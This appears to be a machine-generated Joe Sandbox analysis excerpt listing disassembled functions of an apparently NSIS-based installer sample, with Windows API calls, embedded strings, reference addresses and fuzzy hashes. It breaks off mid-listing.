                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                    APIs
                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                    • String ID:
                                                                                    • API String ID: 4115351271-0
                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                    • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                    • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                    • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                    • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                    • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                    • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $ @$M$N
                                                                                    • API String ID: 1638840714-3479655940
                                                                                    • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                    • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                    Strings
                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                    • \*.*, xrefs: 00406D2F
                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                    • ptF, xrefs: 00406D1A
                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                    • API String ID: 2035342205-1650287579
                                                                                    • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                    • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426576,759223A0,00000000), ref: 00406902
                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                    • String ID: F$A
                                                                                    • API String ID: 3347642858-1281894373
                                                                                    • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                    • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                    • API String ID: 1916479912-1189179171
                                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426576,759223A0,00000000), ref: 00406902
                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426576,759223A0,00000000), ref: 00406A73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
